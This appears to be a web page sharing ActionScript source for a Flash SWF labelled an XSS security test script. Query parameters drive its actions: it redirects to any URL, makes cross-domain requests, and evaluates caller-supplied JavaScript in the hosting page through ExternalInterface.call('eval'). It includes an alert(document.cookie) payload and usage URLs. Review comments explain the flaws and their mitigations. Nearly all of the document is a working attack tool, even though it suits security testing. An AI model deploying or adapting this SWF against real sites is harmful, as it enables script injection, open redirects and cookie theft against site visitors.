ActionScript XSS using Flash
Flash의 Action Script를 이용한 XSS
Source Code
/*
modified by oneandonlyme.kain@gmail.com
2014/04/29
xss - flash security test script.
ref: fly_flash
*/
import flash.net.*;
import flash.events.SecurityErrorEvent;
// Input surface of this test SWF: every value below comes from
// root.loaderInfo.parameters, i.e. the query string / FlashVars chosen by
// whoever embeds or links the SWF. Treat both as untrusted.
var param:Object = root.loaderInfo.parameters;
var action:String = param.a; // selects the test case in attack()
var cmd:String = param.c;    // URL or script text consumed by that case
// Runs one test case selected by the "a" parameter.
// `action` and the file-level `cmd` both originate from
// root.loaderInfo.parameters, so neither is validated input. Each case
// reproduces a "vulnerable SWF" pattern; how much of it reaches the hosting
// page depends on the embed's allowScriptAccess setting (for the
// ExternalInterface cases) and on the target's crossdomain.xml (for "g").
function attack(action)
{
switch (action)
{
case "l" :// location URL
// Unvalidated URL handed to navigateToURL in the current window: an open
// redirect on the hosting origin. A hardened SWF would accept only
// http(s) URLs here rather than any scheme the caller supplies.
navigateToURL(new URLRequest(cmd),"_self");
break;
case "o" :// open URL
// Same as "l" but in a new window; same URL-validation concern.
navigateToURL(new URLRequest(cmd),"_blank");
break;
case "g" :// GET
// Issues a GET to `cmd` from this SWF's origin. COMPLETE fires only when
// the target's crossdomain.xml admits this SWF's domain; otherwise the
// player raises SECURITY_ERROR (see get_sec_error).
// NOTE(review): `Event` is used but not imported, unlike
// SecurityErrorEvent above; presumably the Flash IDE's frame-script
// implicit imports supply it — confirm if compiling outside the IDE.
var loader:URLLoader = new URLLoader(new URLRequest(cmd));
loader.addEventListener(Event.COMPLETE,get_complete);
loader.addEventListener(SecurityErrorEvent.SECURITY_ERROR,get_sec_error);
break;
case "e" :// execute JS
// Caller-supplied text evaluated in the embedding page's JavaScript
// context (DOM XSS on the hosting origin). The mitigation on the page
// side is allowScriptAccess=never/sameDomain on the embed; on the SWF
// side, never pass untrusted input to ExternalInterface.call.
flash.external.ExternalInterface.call("eval", cmd);
break;
case "a" :// execute JS
// Fixed payload; note this overwrites the file-level `cmd`.
cmd = 'alert(document.cookie)';
flash.external.ExternalInterface.call("eval", cmd);
break;
case "x" :// execute JS
// Fixed, harmless marker payload; also overwrites `cmd`.
cmd = 'alert("XSS TEST")';
flash.external.ExternalInterface.call("eval", cmd);
break;
default :
// Unknown or missing action: show the usage text via the page's alert().
var help:String = 'a(action) - c(cmd)\n';
help += '-----------------\n';
help += '1. location to url: xss.swf?a=l&c=http://www.google.com/\n';
help += '2. open url to new window: xss.swf?a=o&c=http://www.google.com/\n';
help += '3. http request to url: xss.swf?a=g&c=http://www.google.com/\n';
help += '4. eval js codz: xss.swf?a=e&c=alert(document.domain)\n';
help += '5. js code alert(document.cookie): xss.swf?a=a\n';
help += '6. XSS TEST: xss.swf?a=x\n';
help += '-----------------\n';
help += 'by oneandonlyme.kain@gmail.com';
flash.external.ExternalInterface.call("alert", help);
break;
}
// Frame script: halt the timeline so the single frame is not replayed.
stop();
}
// COMPLETE handler for the URLLoader started by the "g" case.
// Only reports that the cross-domain GET succeeded; the response body is
// deliberately not forwarded to the page, since (per the original author)
// passing arbitrary content through __flash__toXML/alert may fail.
function get_complete(event:Event)
{
var msg:String = 'corss domain request ok.';
flash.external.ExternalInterface.call("alert", msg);
}
// SECURITY_ERROR handler for the "g" case: the target's crossdomain.xml did
// not grant this SWF's domain, which is the expected (secure) outcome.
function get_sec_error(event:SecurityErrorEvent)
{
var msg:String = '[security error:]\n/crossdomain.xml\ncross domain request is not allowed.';
flash.external.ExternalInterface.call("alert", msg);
}
// Entry point of the frame script: dispatch on the "a" parameter read above.
attack(action);